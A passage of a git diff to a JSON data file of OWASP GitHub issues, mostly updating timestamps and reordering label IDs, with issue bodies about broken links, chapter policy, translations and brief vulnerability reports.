"2024-09-22T16:29:12.908Z", "node_id": "MDU6SXNzdWU3ODY1NjgzODA=", "title": "Participation request", "body": "I'm interested to take part in this amazing initiative. \r\nCould you please guide?\r\nThanks!", @@ -12267,9 +12267,9 @@ 165 ], "labels": [ - 95, 96, - 97 + 97, + 95 ] } }, @@ -12301,8 +12301,8 @@ 166 ], "labels": [ - 95, - 96 + 96, + 95 ] } }, @@ -12334,9 +12334,9 @@ 167 ], "labels": [ - 95, 96, - 97 + 97, + 95 ] } }, @@ -12396,8 +12396,8 @@ "repository": 513, "assignees": [], "labels": [ - 95, - 97 + 97, + 95 ] } }, @@ -12458,8 +12458,8 @@ 166 ], "labels": [ - 95, - 96 + 96, + 95 ] } }, @@ -12496,7 +12496,7 @@ "pk": 406, "fields": { "nest_created_at": "2024-09-11T20:11:45.076Z", - "nest_updated_at": "2024-09-18T19:01:55.977Z", + "nest_updated_at": "2024-09-22T19:23:57.274Z", "node_id": "I_kwDOD7_kCs6Vsx-L", "title": "Translating DevSecOps Guideline to \"Farsi\"", "body": "A clear and technical translation with simplicity is needed for the valuable set of recommendations presented in this project for the Persian speaking community, and we intend to translate it.", @@ -12664,7 +12664,7 @@ "pk": 412, "fields": { "nest_created_at": "2024-09-11T20:12:16.371Z", - "nest_updated_at": "2024-09-18T17:49:02.145Z", + "nest_updated_at": "2024-09-22T16:30:27.224Z", "node_id": "I_kwDOD7JcLc6PiR9W", "title": "No support for UTF-8 characters in path", "body": "WinFIM throws 7773 errors whenever a word in the path to a file contains a non en_US character.\r\nThe problematic letters are replaced in the path which logically makes it wrong as the log detail shows:\r\n`[...] could be renamed / deleted during the hash calculation. This file is ignored in this checking cycle - Can't find a part of the path`\r\n\r\nIt would be nice to add UTF-8 support or at least give a procedure on how to enable it.", @@ -12692,7 +12692,7 @@ "pk": 413, "fields": { "nest_created_at": "2024-09-11T20:13:00.030Z", - "nest_updated_at": "2024-09-18T17:49:40.693Z", + "nest_updated_at": "2024-09-22T16:31:16.880Z", "node_id": "I_kwDOD5sfqM6BytKM", "title": "Please add a description to this project", "body": "", @@ -12720,7 +12720,7 @@ "pk": 414, "fields": { "nest_created_at": "2024-09-11T20:13:07.406Z", - "nest_updated_at": "2024-09-18T17:49:46.676Z", + "nest_updated_at": "2024-09-22T16:31:23.680Z", "node_id": "I_kwDOD5sGHc6BytI9", "title": "Please add a description to this project", "body": "", @@ -12748,7 +12748,7 @@ "pk": 415, "fields": { "nest_created_at": "2024-09-11T20:13:21.779Z", - "nest_updated_at": "2024-09-18T17:49:58.514Z", + "nest_updated_at": "2024-09-22T16:31:39.168Z", "node_id": "MDU6SXNzdWU2NjEwMTIyMTI=", "title": "Create OWASP conference table package", "body": "During the July Outreach Committee call we agreed that we could setup a suggested conference package that the foundation could ship in support of OWASP tables in conferences.\r\n\r\nIn order to close this ticket we need:\r\n\r\nList of suggested artwork\r\nList of suggested swag and formats\r\nA suggested relevant playbook for ordering shipping and expensing the \"conference package\" per world region.\r\nA suggested slide-deck/talking points(?)\r\nSince, to my understanding, OWASP cannot promote commercial distributors, the list of suggested distributors can be private\r\n\r\nThe purpose of this action is to enable volunteers to represent OWASP in events with tables", @@ -12840,7 +12840,7 @@ "pk": 418, "fields": { "nest_created_at": "2024-09-11T20:13:50.765Z", - "nest_updated_at": "2024-09-18T19:02:26.135Z", + "nest_updated_at": "2024-09-22T19:25:09.288Z", "node_id": "MDU6SXNzdWU4MTUxODk0Mzg=", "title": "Suggestions to improve consistency - Update \"Using ISVS\" Figure", "body": "There are several areas which I believe could be more consistent:\r\n\r\n1. Wi-Fi and Bluetooth\r\nThese are very specific protocols. What if the device uses LoRaWAN or Zigbee?\r\nIt could be more beneficial to separate LAN and WAN communications as the threat model is different.\r\n\r\n2. Figure used in https://github.com/OWASP/IoT-Security-Verification-Standard-ISVS/blob/master/en/Using_ISVS.md#the-isvs-security-model\r\nThe blocks used in the figure are confusing: they mix components and features (e.g. Wi-Fi or software updates) with processes (e.g. design, secure development).\r\nI would suggest to:\r\n- Regroup all processes in one box.\r\n- Simplify the device \"design\" with components and features in boxes representing a physical device. For example: \"internal hardware\", \"external hardware\", \"software\".\r\n\r\n", @@ -12864,8 +12864,8 @@ 12 ], "labels": [ - 98, - 99 + 99, + 98 ] } }, @@ -13049,7 +13049,7 @@ "pk": 425, "fields": { "nest_created_at": "2024-09-11T20:14:55.441Z", - "nest_updated_at": "2024-09-18T17:51:04.504Z", + "nest_updated_at": "2024-09-22T16:33:16.366Z", "node_id": "I_kwDODhZs8M6HbWkI", "title": "Create OpenAI Agent backed by this repo & the Wayfinder", "body": "**Describe what content should be added** : \r\n\r\n\r\nCreate an OpenAI chatbot backed by an OS LLM trained with the knowledge from this repo, the Wayfinder project (OWASP Integration Standards), SKF (?)\r\n\r\n**Context** : \r\nAll sections \r\n\r\n\r\n", @@ -13135,8 +13135,8 @@ "repository": 563, "assignees": [], "labels": [ - 102, - 107 + 107, + 102 ] } }, @@ -13166,8 +13166,8 @@ "repository": 563, "assignees": [], "labels": [ - 102, - 107 + 107, + 102 ] } }, @@ -13208,7 +13208,7 @@ "pk": 430, "fields": { "nest_created_at": "2024-09-11T20:15:04.664Z", - "nest_updated_at": "2024-09-18T17:51:06.714Z", + "nest_updated_at": "2024-09-22T16:33:18.373Z", "node_id": "I_kwDODhZs8M6TTjZv", "title": "Add OWASP OpenCRE from Wayfinder project", "body": "**Describe what change you would like** : \r\nThe Open Common Requirement Enumeration, OpenCRE, is part of the Wayfinder project and it would be good to have a page in the Developer Guide for this\r\n\r\n**Context** : \r\nSection: new section `05-requirements/03-opencre.md`\r\n`05-requirements/03-skf.md` moved to `05-requirements/07-skf.md`\r\n", @@ -13500,7 +13500,7 @@ "pk": 440, "fields": { "nest_created_at": "2024-09-11T20:16:59.421Z", - "nest_updated_at": "2024-09-18T17:52:32.406Z", + "nest_updated_at": "2024-09-22T16:35:25.256Z", "node_id": "I_kwDODQO5YM5FJXdo", "title": "Page Must Remove Wiki References", "body": "The wiki should no longer be referenced. Please either move content to these pages or else remove the content. Be advised, regarding the wiki content, I received the following ticket:\r\n------------------\r\nHi , \r\nUnder the link https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Firmware_Analysis\r\n\r\nIn the table:\r\nOn the \"Device Firmware Tools\" row: \r\nİtem: \r\nBinwalk firmware analysis tool ----> https://binwalk.org/ \r\n\r\nleads to bitcoin gambling website \r\n\r\nI checked this with multiple DNS servers. Firefox DOH, Google 8.8.8.8. I think it is not DNS poisoning.\r\n\r\n------------------\r\n\r\nThe above is what led me to find that you are referencing outdated content as I WAS going to direct them here for up-to-date content.", @@ -13822,8 +13822,8 @@ "repository": 596, "assignees": [], "labels": [ - 108, - 112 + 112, + 108 ] } }, @@ -13832,7 +13832,7 @@ "pk": 451, "fields": { "nest_created_at": "2024-09-11T20:17:22.147Z", - "nest_updated_at": "2024-09-18T17:52:39.634Z", + "nest_updated_at": "2024-09-22T16:35:36.699Z", "node_id": "I_kwDODQOsk86V3tch", "title": "Would OWASP be interested in publishing a guide on how to do cross-organization mTLS?", "body": "I've been working with cross-organization mTLS for quite a while and the standard guidance (just do whatever you want) is remarkably terrible. \r\n\r\nWould OWASP be interested in publishing a guide on how to do it right that focuses on security, operations, and not emailing certificates around?", @@ -14886,7 +14886,7 @@ "pk": 485, "fields": { "nest_created_at": "2024-09-11T20:18:21.102Z", - "nest_updated_at": "2024-09-18T17:52:43.285Z", + "nest_updated_at": "2024-09-22T16:37:55.346Z", "node_id": "I_kwDODQOii85U5g2F", "title": "Expense Policy ", "body": "For the items listed above and expenses under USD $250, there are no pre-set limits beyond the “fair and reasonable” test. Expenses not listed and exceeding USD $250 require approval from at least two leaders (or a leader + relevant committee if there is only one leader), and [pre-approval](https://owasporg.atlassian.net/servicedesk/customer/portal/4/group/14) by the Executive Director or their designate. When in doubt, individuals requesting expense reimbursement should apply for pre-approval.\r\n\r\n[](https://owasporg.atlassian.net/servicedesk/customer/portal/4/group/14) > This link goes to Funding Grant Requests.\r\n\r\nAndrew had me create a JIRA ticket for [Pre-Approval of Chapter Expenses](https://owasporg.atlassian.net/servicedesk/customer/portal/8/group/20/create/107). If I need to remove the ticket and chapter leaders need to use the Funding Grant Request ticket, please let me know if it is causing confusion. ", @@ -15082,7 +15082,7 @@ "pk": 492, "fields": { "nest_created_at": "2024-09-11T20:18:30.994Z", - "nest_updated_at": "2024-09-18T17:52:47.123Z", + "nest_updated_at": "2024-09-22T16:38:04.122Z", "node_id": "I_kwDODP8dT85BDtP1", "title": "Incorrect Mail To links", "body": "For the linked emails each email has // before the email address so the mail to address will not function correctly. \r\nExample: mailto://test@owasp.org instead of mailto:test@owasp.org\r\nThis is also present on the \"OWASP WIA, Diversity and Inclusion Committee\" page.", @@ -15110,7 +15110,7 @@ "pk": 493, "fields": { "nest_created_at": "2024-09-11T20:18:35.207Z", - "nest_updated_at": "2024-09-18T17:52:52.622Z", + "nest_updated_at": "2024-09-22T16:38:11.167Z", "node_id": "I_kwDODP8ZEc5AJp1h", "title": "Consider renaming default branch to \"main\"", "body": "Please consider renaming the default branch from \"master\" to \"main\"\r\n\r\nThe process, and detailed explanation/justification can be found at this link:\r\nhttps://github.com/github/renaming\r\n\r\nIf possible, could this be done on every other OWASP open source project? Some companies are getting stricter about inclusive language, and this can help them ensure that their own code that references OWASP projects stays in compliance with design standards.", @@ -15166,7 +15166,7 @@ "pk": 495, "fields": { "nest_created_at": "2024-09-11T20:19:00.154Z", - "nest_updated_at": "2024-09-18T17:53:09.764Z", + "nest_updated_at": "2024-09-22T16:38:37.643Z", "node_id": "I_kwDODOEwJ86OePLH", "title": "How to mapping OWASP Mobile Top 10 to CWE", "body": "Dear Crew Staff\r\nI'm a researcher of mobile secuity. OWASP Mobile top 10 is the critical issue to solve and discuss so according to my research, I wonder if there is a mapping table that can help me to map owasp mobile top 10 and CWE or owasp top 10. I survey lots of document and nothing can solve my problem. Could anyone help me if the mapping table exist? Or the inner document can release privately. Thanks a lot.", @@ -15194,7 +15194,7 @@ "pk": 496, "fields": { "nest_created_at": "2024-09-11T20:19:11.900Z", - "nest_updated_at": "2024-09-18T17:53:18.765Z", + "nest_updated_at": "2024-09-22T16:38:52.941Z", "node_id": "I_kwDODMGC3c5qYHjA", "title": "run a daily workflow action to check all links ", "body": "It would be good to automate checking the links for the SecurityRAT OWASP project pages, in particular :\r\n* https://securityrat.org/\r\n* https://securityrat.github.io/", @@ -15278,7 +15278,7 @@ "pk": 499, "fields": { "nest_created_at": "2024-09-11T20:19:18.133Z", - "nest_updated_at": "2024-09-18T19:02:31.881Z", + "nest_updated_at": "2024-09-22T19:25:18.096Z", "node_id": "I_kwDODKzRYM5uc4an", "title": "Not able to build from source", "body": "Hello. I am facing an error while building from the source. The error is regarding absence of gcc and g++ but in my kali linux virtual machine I have gcc and g++ v13.1.0. \r\n\"IoTGoat\"\r\n", @@ -15334,7 +15334,7 @@ "pk": 501, "fields": { "nest_created_at": "2024-09-11T20:21:59.383Z", - "nest_updated_at": "2024-09-18T17:55:26.389Z", + "nest_updated_at": "2024-09-22T16:42:04.318Z", "node_id": "I_kwDODGgRDc5nCnH-", "title": "Non-Responsive Website", "body": "## Issue\r\nThe website does not appear to be responsive and does not adapt to different screen sizes or resolutions. As a result, the content gets distorted, and the layout becomes unorganized, making it challenging to read and access the information.\r\n\r\n## Impact\r\nThe lack of responsiveness negatively affects user experience and hinders accessibility. With the increasing number of users accessing websites from mobile devices, it is crucial to ensure a responsive design to provide a seamless browsing experience.\r\n\r\nSteps to Reproduce:\r\n\r\n- Open the website on a Chrome or Firefox browser.\r\n- Resize the browser window to simulate different screen sizes or resolutions.\r\n- Observe the layout and content display.\r\n- Expected Behavior:\r\nThe website should adapt to different screen sizes, maintaining a consistent layout, readability, and usability across devices.\r\n\r\n## Actual Behavior\r\nThe website does not adjust its layout when viewed on smaller devices, resulting in content overlapping, text being cut off, and elements becoming difficult to interact with.\r\n\r\n## Attached Screenshots\r\n\"image\"\r\n\r\nPlease let me know if you require any further information to address this issue effectively. I believe that resolving this problem will greatly enhance the user experience of the OWASP Netherlands Chapter website.\r\n\r\nThank you for your attention to this matter.\r\n\r\n", @@ -15362,7 +15362,7 @@ "pk": 502, "fields": { "nest_created_at": "2024-09-11T20:22:27.862Z", - "nest_updated_at": "2024-09-18T17:55:48.755Z", + "nest_updated_at": "2024-09-22T16:42:41.519Z", "node_id": "MDU6SXNzdWU4MjAxNDY4ODQ=", "title": "Blank link and broken image", "body": "On the index page edgescan is a blank link and the EY image is broken - assuming this should be Mmk?", @@ -15390,7 +15390,7 @@ "pk": 503, "fields": { "nest_created_at": "2024-09-11T20:25:44.120Z", - "nest_updated_at": "2024-09-18T17:58:24.606Z", + "nest_updated_at": "2024-09-22T16:47:00.864Z", "node_id": "I_kwDODGgJzM5mQudb", "title": "Social Media Links no longer work", "body": "While trying to get ahold of the OWASP chapter in omaha, I found the following links no longer work:\r\n- https://www.facebook.com/blu3gl0w13\r\n- https://www.instagram.com/blu3gl0w13/", @@ -15418,7 +15418,7 @@ "pk": 504, "fields": { "nest_created_at": "2024-09-11T20:30:51.744Z", - "nest_updated_at": "2024-09-18T18:02:33.555Z", + "nest_updated_at": "2024-09-22T17:24:15.441Z", "node_id": "MDU6SXNzdWU5MjA2Nzg1OTU=", "title": "Please re-activate using activation policy", "body": "Ricardo and Hector,\r\n\r\nThe Paraguay chapter has been suspended due to inactivity. The last meeting activity on the OWASP chapter page was March of 2019. The chapter has not submitted the ticket to request shared services like the Meetup Pro account and zoom to host virtual meetings. \r\n\r\nMany chapters failed to complete the chapter re-activation process and have been deactivated. This doesn't mean gone forever; it means you need to take some additional steps, very similar to what you needed to do before the deadlines. Under the Chapter Policy, you can contact the Chapter Committee and ask for new leadership or elections, or you can follow this re-activation process:\r\n\r\nThe complete re-activation process:\r\nFind at least 50% new leadership. There is a two leader minimum requirement for all new and re-activated chapters; ensure that the chapter requirements do not fall to one person. If life gets busy for one leader, members can still have chapter meetings in their area.Enter a ticket to re-activate your chapter, and use this ticket to add the new leaders to your chapter.https://owasporg.atlassian.net/servicedesk/customer/portal/7/group/18/create/73 ALL requested information for all the leaders is to be included in the ticket to process.Once the GitHub and Meetup are active, a minimum of two leaders has access to GitHub and Meetup. Preferably all leaders should have access to spread the load.Follow the migration instructions to customize your chapter home page:Simple to follow instructions https://owasp.org/migration/Simple to follow video https://youtu.be/tEm-YCeQno0 If you are getting build errors, install a local Jekyll instance following the instructions in the Migration Guide and work out what's wrong. If you still can't fix it, please log a non-funding request at https://contact.owasp.org straight away.Schedule a meeting or activity that the public can attend to occur within 90 days, and make sure it's on your chapter's home page. If you use Meetup Pro, add this to your index.md file to automatically be included:{% include chapter_events.html group=page.meetup-group %}This only works if the OWASP Foundation is the organizer of your Meetup, you are co-organizers and the metadata on the index.md includes your meetup groups name:\r\nmeetup-group: OWASP-Colorado-Springs-Meetup\r\nLastly, it would be best if you kept in contact with your members, speakers, the Chapter Committee, or the OWASP Foundation by monitoring and responding to your owasp.org email address. It's okay to forward this email address to another you use, but we strongly prefer leaders using the owasp.org email address for official chapter business. The policy requires you to respond within 7 to 30 days depending on the request, so please make sure you're regularly checking mails, particularly in the lead-up to your meetings.\r\n\r\nYou can find the Monthly Slides and many helpful resources, such as the speaker's bureau at the Chapter Committee's Resources page:\r\nhttps://owasp.org/www-committee-chapter/#div-resources_for_chapters\r\nYou can find the Chapter Policy, to which this process complies here: \r\nhttps://owasp.org/www-policy/operational/chapters\r\nThe Chapter policy requires that a meeting is held within 90 days of re-activation, or leadership will again be cleared and the chapter deactivated. \r\n\r\nWe look forward to seeing many more meetings from your chapter! \r\n\r\nThanks,\r\n\r\nAndrew van der Stock, Executive Director\r\nLisa Jones, Community Manager", @@ -15446,7 +15446,7 @@ "pk": 505, "fields": { "nest_created_at": "2024-09-11T20:31:05.853Z", - "nest_updated_at": "2024-09-18T18:02:46.803Z", + "nest_updated_at": "2024-09-22T17:24:33.059Z", "node_id": "I_kwDODGgAjc5fOqRT", "title": "Como fazer parte?", "body": "Olá! Já sou membro no OWASP, gostaria de fazer parte do chapter SP.\r\n\r\nObrigado.", @@ -15474,7 +15474,7 @@ "pk": 506, "fields": { "nest_created_at": "2024-09-11T20:31:39.399Z", - "nest_updated_at": "2024-09-18T18:03:14.981Z", + "nest_updated_at": "2024-09-22T17:25:21.348Z", "node_id": "MDU6SXNzdWU1NjM3MjExODk=", "title": "error with _layouts/col-sidebar.htmlI ", "body": "Hi!\r\n\r\nIm in troubles...During the push I got an error message that I can't do anything with:\r\n\r\n> The page build failed for the `master` branch with the following error:\r\n> \r\n> A file was included in `/_layouts/col-sidebar.html` that is a symlink or does not exist in your `_includes` directory. For more information, see https://help.github.com/en/github/working-with-github-pages/troubleshooting-jekyll-build-errors-for-github-pages-sites#file-is-a-symlink.\r\n\r\nBUT... the file is not in my repo ??\r\n /_layouts/col-sidebar.htmlI don't find it in the repo. I\r\n\r\nI think this is an error yet informed by other capters (I saw it in germany chapter)\r\n\r\nTIA!!", @@ -15558,7 +15558,7 @@ "pk": 509, "fields": { "nest_created_at": "2024-09-11T20:33:06.843Z", - "nest_updated_at": "2024-09-18T18:04:22.983Z", + "nest_updated_at": "2024-09-22T17:27:09.855Z", "node_id": "I_kwDODGf8oM551hT3", "title": "Find contacts for other colleges in area", "body": "", @@ -15586,7 +15586,7 @@ "pk": 510, "fields": { "nest_created_at": "2024-09-11T20:33:45.402Z", - "nest_updated_at": "2024-09-18T18:04:53.578Z", + "nest_updated_at": "2024-09-22T17:27:54.435Z", "node_id": "MDU6SXNzdWU3MDQ0OTQyNjA=", "title": "Info.md file with wrong linkage", "body": "Please update your links in info.md to:\r\n1.) Remove Become a Member (it is at the top of the page)\r\n2.) Remove www and index.php references that are holdovers from the wiki (use the owasp.org and current links)", @@ -15614,7 +15614,7 @@ "pk": 511, "fields": { "nest_created_at": "2024-09-11T20:33:52.920Z", - "nest_updated_at": "2024-09-18T18:04:59.550Z", + "nest_updated_at": "2024-09-22T17:28:02.860Z", "node_id": "I_kwDODGf7Oc6Euih_", "title": "Social links broken", "body": "I am interested in a local meet up! I noticed that the social links are broken. Are there updated links?", @@ -15642,7 +15642,7 @@ "pk": 512, "fields": { "nest_created_at": "2024-09-11T20:36:38.848Z", - "nest_updated_at": "2024-09-18T18:07:13.663Z", + "nest_updated_at": "2024-09-22T17:31:11.184Z", "node_id": "I_kwDODGf2JM6BytHM", "title": "Please add a description to this project", "body": "", @@ -15729,7 +15729,7 @@ "pk": 515, "fields": { "nest_created_at": "2024-09-11T20:37:21.085Z", - "nest_updated_at": "2024-09-18T18:07:47.681Z", + "nest_updated_at": "2024-09-22T17:31:57.740Z", "node_id": "I_kwDODGf08s56hh6D", "title": "Will there be any update plan?", "body": "The last update was 4 years ago, will there be any update plan?", @@ -15757,7 +15757,7 @@ "pk": 516, "fields": { "nest_created_at": "2024-09-11T20:37:28.792Z", - "nest_updated_at": "2024-09-18T18:07:53.784Z", + "nest_updated_at": "2024-09-22T17:32:06.025Z", "node_id": "MDU6SXNzdWU4NTkxMzI5NDY=", "title": "Can we update the benchmark scorecards?", "body": "I was looking at the _\"tool support / results\"_ tab:\r\n\r\n![image](https://user-images.githubusercontent.com/47480384/114915996-e9c6e900-9de9-11eb-8c48-4c1a0d444514.png)\r\n\r\nAnd found that we have very nice results in this link:\r\nhttps://rawgit.com/OWASP/Benchmark/master/scorecard/OWASP_Benchmark_Home.html\r\n\r\nHowever:\r\n- [ ] It was generated in 2016, can we run results today and update the image?\r\n- [ ] We ([Fluid Attacks](https://fluidattacks.com)) would like to include our security vulnerability detection tool in which we've recently evaluated results against the benchmark:\r\n - https://fluidattacks.com/blog/owasp-benchmark-fluid-attacks/ \r\n - https://docs.fluidattacks.com/machine/scanner/reproducibility (this link is experimental)\r\n \r\n Could you please give us some orientation on how to appear in the results? here: https://owasp.org/www-project-benchmark/ \r\n- [ ] rawgit.com \"RawGit has reached the end of its useful life\", can we host it in other place?\r\n\r\nI volunteer myself for any task needed, just let me know how could we push this forward\r\n\r\nThanks!", @@ -15785,7 +15785,7 @@ "pk": 517, "fields": { "nest_created_at": "2024-09-11T20:37:32.842Z", - "nest_updated_at": "2024-09-18T18:07:57.827Z", + "nest_updated_at": "2024-09-22T17:32:12.324Z", "node_id": "I_kwDODGf0rc5C0F52", "title": "Sort list entries by GH stars and/or age (instead of alphabetically)", "body": "**As an** author of a popular and up-to-date vulnerable application **I want** that app to show up at the top of the relevant VWAD lists **so that** the lists in general represent more of a ranking than an index.\r\n\r\nWith the current implementation of grabbing the GitHub star badges only (i.e. not having the actual number of stars available during rendering) this is probably not possible. The actual number of stars needs to be retrieved in some way. This could for example be a nightly job creating a simple JSON file in the repo that could then be processed during rendering.", @@ -15816,7 +15816,7 @@ "pk": 518, "fields": { "nest_created_at": "2024-09-11T20:37:54.397Z", - "nest_updated_at": "2024-09-18T18:08:14.656Z", + "nest_updated_at": "2024-09-22T17:32:35.141Z", "node_id": "MDU6SXNzdWU1NTE4OTkzNjQ=", "title": "Wiki Deck pages", "body": "The previous wiki deck have not been recreated on the new GitHub site. The archived media wiki pages are at:\r\n\r\nhttps://wiki.owasp.org/index.php/Cornucopia_-_Ecommerce_Website_Edition_-_Wiki_Deck\r\n\r\nWondering if there is a way to script the autogeneration of multiple language versions of card pages from say an xml data file. Can anyone suggest ideas\"", @@ -15848,7 +15848,7 @@ "pk": 519, "fields": { "nest_created_at": "2024-09-11T20:38:02.504Z", - "nest_updated_at": "2024-09-18T18:08:21.404Z", + "nest_updated_at": "2024-09-22T17:32:46.521Z", "node_id": "I_kwDODGfz8s6BytEW", "title": "Please add a description to this project", "body": "", @@ -15876,7 +15876,7 @@ "pk": 520, "fields": { "nest_created_at": "2024-09-11T20:38:44.786Z", - "nest_updated_at": "2024-09-18T18:08:55.895Z", + "nest_updated_at": "2024-09-22T17:33:32.665Z", "node_id": "I_kwDODGfyyM5CvJfI", "title": "Repetition of Security Checks in Projects ASVS L1 - Authentication Verification Requirements", "body": "I was navigating through the application and found that there is a repetition of each check in Projects -> ASVS L1 -> Authentication Verification Requirements\r\n\r\nNot sure if this is by design or an error. Though both entries consist of same details! \r\n\r\nhttps://demo.securityknowledgeframework.org/projects/summary/\r\n\r\n\"Screenshot\r\n\r\nThank You! \r\n", @@ -16024,7 +16024,7 @@ "pk": 525, "fields": { "nest_created_at": "2024-09-11T20:39:09.782Z", - "nest_updated_at": "2024-09-18T18:09:13.200Z", + "nest_updated_at": "2024-09-22T17:34:05.442Z", "node_id": "I_kwDODGfyKs59hvQk", "title": "SAMM ToolBox point to incorrect link", "body": "In the file info.md, the \"SAMM Toolbox v2\" point to a broken Excel spread sheet : https://github.com/owaspsamm/core/releases/download/v2.0.3/SAMM_spreadsheet.xlsx\r\nThe correct ressource is located here : https://github.com/owaspsamm/core/releases/download/v2.0.8/SAMM_spreadsheet.xlsx\r\n", @@ -16073,9 +16073,9 @@ "repository": 958, "assignees": [], "labels": [ + 128, 126, - 127, - 128 + 127 ] } }, @@ -16135,9 +16135,9 @@ "repository": 958, "assignees": [], "labels": [ - 127, 128, - 129 + 129, + 127 ] } }, @@ -16231,8 +16231,8 @@ "repository": 958, "assignees": [], "labels": [ - 127, - 130 + 130, + 127 ] } }, @@ -16241,7 +16241,7 @@ "pk": 532, "fields": { "nest_created_at": "2024-09-11T20:39:29.358Z", - "nest_updated_at": "2024-09-18T18:09:19.158Z", + "nest_updated_at": "2024-09-22T17:34:15.395Z", "node_id": "I_kwDODGfx7M6V-OuV", "title": "The isValidUrl method in csrfguard.js uses an insecure string-matching technique", "body": "We had run a scan after upgrading csrfguard library to version 4.3.0 and found below vulnerability with severity 5.4 .\r\nIt also reported that there is no non-vulnerable version of this component.\r\n\r\n**Explanation**\r\nThe csrfguard package is vulnerable to Cross-Site Request Forgery (CSRF). The isValidUrl method in csrfguard.js uses an insecure string-matching technique. Consequently, an attacker could exploit this vulnerability to cause tokens to leak in links to external (attacker-controlled) domains.\r\n\r\n**Version Affected**\r\n[3.1.0,4.4.0]\r\n\r\n**CVSS Details**\r\nSonatype CVSS 3 : 5.4\r\nCVSS Vector : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", @@ -16325,7 +16325,7 @@ "pk": 535, "fields": { "nest_created_at": "2024-09-11T20:39:38.591Z", - "nest_updated_at": "2024-09-18T18:09:26.042Z", + "nest_updated_at": "2024-09-22T17:34:37.288Z", "node_id": "I_kwDODGfxq854eFXk", "title": "There is no space on the left side.", "body": "\r\n![snip](https://github.com/OWASP/www-project-webgoat/assets/122084921/1d052e24-6eea-496c-a21a-68cf86f63729)\r\n\r\nOn the left side there should be some space or padding , it will look good.\r\n", @@ -16756,9 +16756,9 @@ 238 ], "labels": [ + 136, 134, - 135, - 136 + 135 ] } }, @@ -16791,8 +16791,8 @@ 238 ], "labels": [ - 132, - 137 + 137, + 132 ] } }, @@ -16856,9 +16856,9 @@ 238 ], "labels": [ + 136, 134, - 135, - 136 + 135 ] } }, @@ -16985,9 +16985,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 139 + 139, + 135 ] } }, @@ -17017,9 +17017,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 139 + 139, + 135 ] } }, @@ -17049,9 +17049,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 139 + 139, + 135 ] } }, @@ -17081,9 +17081,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 139 + 139, + 135 ] } }, @@ -17113,9 +17113,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 139 + 139, + 135 ] } }, @@ -17145,9 +17145,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 139 + 139, + 135 ] } }, @@ -17179,9 +17179,9 @@ 239 ], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17211,9 +17211,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17243,9 +17243,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17275,9 +17275,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17307,9 +17307,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17341,9 +17341,9 @@ 241 ], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17375,9 +17375,9 @@ 242 ], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17409,9 +17409,9 @@ 239 ], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17441,9 +17441,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17473,9 +17473,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 140 + 140, + 135 ] } }, @@ -17509,9 +17509,9 @@ 239 ], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17544,9 +17544,9 @@ 239 ], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17576,9 +17576,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17608,9 +17608,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17640,9 +17640,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17676,9 +17676,9 @@ 239 ], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17713,8 +17713,8 @@ 239 ], "labels": [ - 135, - 141 + 141, + 135 ] } }, @@ -17744,9 +17744,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17776,9 +17776,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -17808,9 +17808,9 @@ "repository": 981, "assignees": [], "labels": [ - 135, 136, - 141 + 141, + 135 ] } }, @@ -18061,8 +18061,8 @@ 244 ], "labels": [ - 134, - 136 + 136, + 134 ] } }, @@ -18235,7 +18235,7 @@ "pk": 595, "fields": { "nest_created_at": "2024-09-11T20:42:41.693Z", - "nest_updated_at": "2024-09-18T18:10:22.180Z", + "nest_updated_at": "2024-09-22T17:35:58.896Z", "node_id": "I_kwDODGfvrc6LD2Xp", "title": "[FEEDBACK]: Description of ML04 Membership Inference Attack", "body": "### Type\n\nGeneral Feedback\n\n### What would you like to report?\n\nhttps://github.com/OWASP/www-project-machine-learning-security-top-10/blob/f1cf662ca9ce5cfcd4c72ab8d4bff91ea64f46d7/docs/ML04_2023-Membership_Inference_Attack.md?plain=1#L27\r\n\r\nHere, the documentation states that `an attacker manipulates the model’s training data`, but from my understanding the objective of a membership inference attack is to [\"\\[...\\] predict whether or not a particular example was contained in the model’s training dataset.\"](https://ieeexplore.ieee.org/document/9833649), so the attacker shouldn't have access to the training data.\r\n\r\nI can create a pull request to update the documentation. Let me know if you'd like me to proceed.\n\n### Code of Conduct\n\n- [X] I agree to follow this project's Code of Conduct", @@ -18258,8 +18258,8 @@ 238 ], "labels": [ - 132, - 143 + 143, + 132 ] } }, @@ -18268,7 +18268,7 @@ "pk": 596, "fields": { "nest_created_at": "2024-09-11T20:43:41.238Z", - "nest_updated_at": "2024-09-18T18:11:15.357Z", + "nest_updated_at": "2024-09-22T17:37:08.146Z", "node_id": "I_kwDODGftyc5feB1C", "title": "small grammar error", "body": "In the index.md, and in CNAS-1: Insecure cloud, container or orchestration configuration\r\nshould 